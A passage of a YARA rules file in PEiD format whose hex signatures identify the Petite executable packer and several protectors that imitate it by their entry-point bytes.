5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v22_wwwun4seencompetite: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_21: PEiD\r\n{\r\n    strings:\r\n        $a = { 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_20: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 18 8B CC 8D A0 54 BC 00 00 8B C3 8D 90 E0 15 00 00 68 00 00 00 00 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 E3 00 00 FF 8B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v_after_v14_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v13_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8D 88 ?? F0 ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_12_c1998_Ian_Luck_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00 0A 00 0B 00 0D 00 0F 00 11 00 13 00 17 00 1B 00 1F 00 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 83 00 A3 00 C3 00 E3 00 02 01 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 01 02 02 02 }\r\n        $b = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00 0A 00 0B 00 0D 00 0F 00 11 00 13 00 17 00 1B 00 1F 00 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 83 00 A3 00 C3 00 E3 00 02 01 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 01 02 02 02 02 03 03 03 03 04 04 04 04 05 05 05 05 00 70 70 01 00 02 00 03 00 04 00 05 00 07 00 09 00 0D 00 11 00 19 00 21 00 31 00 41 00 61 00 81 00 C1 00 01 01 81 01 01 02 01 03 01 04 01 06 01 08 01 0C 01 10 01 18 01 20 01 30 01 40 01 60 00 00 00 00 01 01 02 02 03 03 04 04 05 05 06 06 07 07 08 08 09 09 0A 0A 0B 0B 0C 0C 0D 0D 10 11 12 00 08 07 09 06 0A 05 0B 04 0C 03 0D 02 0E 01 0F 58 2C 08 50 8B C8 8B D0 81 C1 ?? D2 00 00 81 C2 ?? ?? 00 00 89 20 8B E1 50 81 2C 24 00 ?? ?? ?? FF 30 50 80 04 24 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Petite_v22_Compresor_wwwun4seencompetite: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 ?? ?? 00 ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_PEtite_2x_level_0: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 B8 00 90 90 00 6A 00 68 90 90 90 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 03 00 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v12_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 CA ?? ?? ?? 03 ?? 04 ?? 05 ?? 06 ?? 07 ?? 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_22_c1998_99_Ian_Luck_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8D 88 ?? F0 ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v22: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v20: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A ?? FF 50 18 8B CC 8D A0 54 BC ?? ?? 8B C3 8D 90 E0 15 ?? ?? 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v21: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v22_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_PEtite_2x_level_0_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 B8 00 90 90 00 6A 00 68 90 90 90 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 03 00 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_PEtite_21_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 50 40 00 6A 00 68 BB 21 40 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 83 C4 04 61 66 9D 64 8F 05 00 00 00 00 83 C4 08 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_13_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 50 8D 88 00 ?? ?? ?? 8D 90 ?? ?? 00 00 8B DC 8B E1 68 00 00 ?? ?? 53 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 DA 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v_after_v14: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_14_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC 8D A0 54 BC 00 00 50 8B C3 8D 90 ?? 16 00 00 68 00 00 ?? ?? 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 D8 14 00 00 8B 44 24 18 F6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v21_1: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_12_c1998_Ian_Luck_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00 0A 00 0B 00 0D 00 0F 00 11 00 13 00 17 00 1B 00 1F 00 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 83 00 A3 00 C3 00 E3 00 02 01 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 01 02 02 02 02 03 03 03 03 04 04 04 04 05 05 05 05 00 70 70 01 00 02 00 03 00 04 00 05 00 07 00 09 00 0D 00 11 00 19 00 21 00 31 00 41 00 61 00 81 00 C1 00 01 01 81 01 01 02 01 03 01 04 01 06 01 08 01 0C 01 10 01 18 01 20 01 30 01 40 01 60 00 00 00 00 01 01 02 02 03 03 04 04 05 05 06 06 07 07 08 08 09 09 0A 0A 0B 0B 0C 0C 0D 0D 10 11 12 00 08 07 09 06 0A 05 0B 04 0C 03 0D 02 0E 01 0F 58 2C 08 50 8B C8 8B D0 81 C1 ?? D2 00 00 81 C2 ?? ?? 00 00 89 20 8B E1 50 81 2C 24 00 ?? ?? ?? FF 30 50 80 04 24 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_22_c1998_99_Ian_Luck_h: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? 66 9C 60 50 8D 88 ?? F0 ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42 }\r\n        $b = { 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 ?? ?? 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A ?? 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 59 F3 A5 59 66 83 C7 68 81 C6 ?? ?? 00 00 F3 A5 FF D3 58 8D 90 B8 01 00 00 8B 0A 0F BA F1 1F 73 16 8B 04 24 FD 8B F0 8B F8 03 72 04 03 7A 08 F3 A5 83 C2 0C FC EB E2 83 C2 10 8B 5A F4 85 DB 74 D8 8B 04 24 8B 7A F8 03 F8 52 8D 34 01 EB 17 58 58 58 5A 74 C4 E9 1C FF FF FF 02 D2 75 07 8A 16 83 EE FF 12 D2 C3 81 FB 00 00 01 00 73 0E 68 60 C0 FF FF 68 60 FC FF FF B6 05 EB 22 81 FB 00 00 04 00 73 0E 68 80 81 FF FF 68 80 F9 FF FF B6 07 EB 0C 68 00 83 FF FF 68 00 FB FF FF B6 08 6A 00 32 D2 4B A4 33 C9 83 FB 00 7E A4 E8 AA FF FF FF 72 17 A4 30 5F FF 4B EB ED 41 E8 9B FF FF FF 13 C9 E8 94 FF FF FF 72 F2 C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule AHTeam_EP_Protector_03_fake_PEtite_22_FEUERRADER: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 B8 00 00 00 00 68 00 00 00 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v21_2_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v14_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 ?? ?? ?? ?? 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v22_wwwun4seencompetite_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 ?? ?? 00 ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v14: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 ?? ?? ?? ?? 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_vxx: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_14: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC }\r\n        $b = { ?? ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC 8D A0 54 BC 00 00 50 8B C3 8D 90 ?? 16 00 00 68 00 00 ?? ?? 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 D8 14 00 00 8B 44 24 18 F6 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Petite_12: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_13: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8D 88 00 F0 00 00 8D 90 04 16 00 00 8B DC 8B E1 }\r\n        $b = { ?? ?? ?? ?? ?? ?? 9C 60 50 8D 88 00 ?? ?? ?? 8D 90 ?? ?? 00 00 8B DC 8B E1 68 00 00 ?? ?? 53 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 DA 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PackerPetite_v22_Compresor_wwwun4seencompetite: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 ?0 ?? 00 6? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_14_c1998_99_Ian_Luck_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v13_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? 66 9C 60 50 8D 88 00 F0 00 00 8D 90 04 16 00 00 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v14_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 ?? ?? ?? ?? 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_14_c1998_99_Ian_Luck_h: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC }\r\n        $b = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC 8D A0 54 BC 00 00 50 8B C3 8D 90 ?? 16 00 00 68 00 00 ?? ?? 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 D8 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 72 04 03 7A 08 8B 0A F3 A5 83 C2 0C FC EB D4 8B 7A 08 03 F8 8B 5A 04 85 DB 74 13 52 53 57 03 02 50 E8 79 00 00 00 85 C0 74 30 5F 5F 58 5A 8B 4A 0C C1 F9 02 33 C0 F3 AB 8B 4A 0C 83 E1 03 F3 AA 83 C2 10 EB 9E 45 52 52 4F 52 21 00 43 6F 72 72 75 70 74 20 44 61 74 61 21 00 8B 64 24 24 8B 04 24 83 C4 26 8B D0 66 81 C2 7E 01 6A 10 8B D8 66 05 77 01 50 52 6A 00 03 1B FF 13 6A FF FF 53 08 56 57 8B 7C 24 0C 8B 74 24 10 8B 4C 24 14 C1 F9 02 F3 A5 8B 4C 24 14 83 E1 03 F3 A4 5F 5E C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_032a_fake_PEtite_21_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 2B 00 00 00 0D 0A 0D 0A 0D 0A 52 65 67 69 73 74 41 72 65 64 20 74 6F 3A 20 4E 4F 4E 2D 43 4F 4D 4D 45 52 43 49 41 4C 21 21 0D 0A 0D 0A 0D 00 58 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_21_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_13_c1998_Ian_Luck_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 ?? ?? 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A ?? 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 59 F3 A5 59 66 83 C7 68 81 C6 ?? ?? 00 00 F3 A5 FF D3 58 8D 90 B8 01 00 00 8B 0A 0F BA F1 1F 73 16 8B 04 24 FD 8B F0 8B F8 03 72 04 03 7A 08 F3 A5 83 C2 0C FC EB E2 83 C2 10 8B 5A F4 85 DB 74 D8 8B 04 24 8B 7A F8 03 F8 52 8D 34 01 EB 17 58 58 58 5A 74 C4 E9 1C FF FF FF 02 D2 75 07 8A 16 83 EE FF 12 D2 C3 81 FB 00 00 01 00 73 0E 68 60 C0 FF FF 68 60 FC FF FF B6 05 EB 22 81 FB 00 00 04 00 73 0E 68 80 81 FF FF 68 80 F9 FF FF B6 07 EB 0C 68 00 83 FF FF 68 00 FB FF FF B6 08 6A 00 32 D2 4B A4 33 C9 83 FB 00 7E A4 E8 AA FF FF FF 72 17 A4 30 5F FF 4B EB ED 41 E8 9B FF FF FF 13 C9 E8 94 FF FF FF 72 F2 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v12_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v22_wwwun4seencompetite: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 ?? ?? 00 ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 }\r\n        $b = { B8 00 ?0 ?? 00 6? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Petite_22_c1998_99_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 ?? ?? 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A ?? 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 59 F3 A5 59 66 }\r\n        $b = { 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 ?? ?? 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A ?? 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 59 F3 A5 59 66 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PEtite_v21_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_12_c1998_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00 0A 00 0B 00 0D 00 0F 00 11 00 13 00 17 00 1B 00 1F 00 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 83 00 A3 00 C3 00 E3 00 02 01 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 01 02 02 02 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v14: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A ?? FF 50 14 8B CC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v13: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? 66 9C 60 50 8D 88 ?? F0 ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42 }\r\n        $b = { 66 9C 60 50 8D 88 ?? F0 ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PEtite_v12: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 CA ?? ?? ?? 03 ?? 04 ?? 05 ?? 06 ?? 07 ?? 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v22_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_22_PE_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 6A 00 68 00 00 00 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 03 00 68 70 BC 00 00 6A 00 FF 50 1C 8B CC 8D A0 70 BC 00 00 89 61 2E 68 00 00 00 00 51 8B 7C 24 04 8B 33 66 81 C7 80 07 8D 74 1E 08 89 3B 53 8B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v14_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 59 F3 A5 83 C8 FF 8B DF AB 40 AB 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_vxx_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_PEtite_2x_level_0_Anorganix_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 B8 00 90 90 00 6A 00 68 90 90 90 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 03 00 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_14_c1998_99_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC 8D A0 54 BC 00 00 50 8B C3 8D 90 ?? 16 00 00 68 00 00 ?? ?? 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 D8 14 00 00 8B 44 24 18 F6 }\r\n        $b = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC 8D A0 54 BC 00 00 50 8B C3 8D 90 ?? 16 00 00 68 00 00 ?? ?? 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 D8 14 00 00 8B 44 24 18 F6 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Petite_v21_2_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_13a: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 66 9C 60 50 8D 88 00 00 00 00 8D 90 00 00 00 00 8B DC 8B E1 68 00 00 00 00 53 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 DC 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v21_1_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v21_2: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v21_1_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_22_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 68 00 00 00 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 00 00 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A 00 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v_after_v14_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_14_c1998_99_Ian_Luck_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC 8D A0 54 BC 00 00 50 8B C3 8D 90 ?? 16 00 00 68 00 00 ?? ?? 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 D8 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 72 04 03 7A 08 8B 0A F3 A5 83 C2 0C FC EB D4 8B 7A 08 03 F8 8B 5A 04 85 DB 74 13 52 53 57 03 02 50 E8 79 00 00 00 85 C0 74 30 